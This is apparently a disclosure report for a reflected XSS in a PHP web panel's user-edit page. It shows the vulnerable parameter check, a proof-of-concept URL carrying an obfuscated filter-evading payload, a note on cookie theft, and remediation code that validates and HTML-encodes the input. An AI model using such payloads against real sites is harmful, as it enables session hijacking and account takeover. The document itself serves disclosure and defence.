The user-controlled `user` GET parameter in index.php is not sanitized, resulting in Cross-Site Scripting (XSS).
GET https://{HOST}/edit/user
**File: /web/edit/user/index.php#L11**
```php
// Check user argument
if (empty($_GET['user'])) {
    header("Location: /list/user/");
    exit;
}
```
https://{HOST}/edit/user/?user=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//&token=1fb3da5a8992ed8fd9d95cfe828457d4
This vulnerability is capable of running malicious JavaScript code on web pages, stealing a user's cookie and gaining unauthorized access to that user's account through the stolen cookie.
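One way to close the gap left by the `empty()` check above, as an added example that is not the project's own code: validate `user` against an allow-list before use, and HTML-encode it wherever it is written into the page. The username pattern, the helper names `validated_user` and `h`, and the `v_username` field are assumptions; the page does not show where the value is echoed.

```php
<?php
declare(strict_types=1);

// Assumed username rule; use the one the application enforces at account creation.
const USERNAME_PATTERN = '/\A[A-Za-z0-9][A-Za-z0-9._-]{0,31}\z/';

/** Return the validated username, or null if the parameter is missing or malformed. */
function validated_user(array $query): ?string
{
    $user = $query['user'] ?? null;
    // Arrays (?user[]=x) and empty values are rejected along with bad characters.
    if (!is_string($user) || preg_match(USERNAME_PATTERN, $user) !== 1) {
        return null;
    }
    return $user;
}

/** Encode a value for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample query strings: a normal name, markup, a quote, an array, nothing.
$samples = [
    ['user' => 'admin'],
    ['user' => '<i>markup</i>'],
    ['user' => 'a" b'],
    ['user' => ['nested']],
    [],
];

foreach ($samples as $query) {
    $user = validated_user($query);
    if ($user === null) {
        // In index.php this branch would send the redirect to /list/user/ and exit.
        echo 'rejected: ', h((string) json_encode($query)), PHP_EOL;
        continue;
    }
    // Encode at the point of output even though the value already passed validation.
    // v_username is a hypothetical field name.
    echo '<input type="text" name="v_username" value="', h($user), '">', PHP_EOL;
}
```

Only `admin` reaches the output branch; the other four samples are rejected, and the rejected values are themselves encoded before being printed.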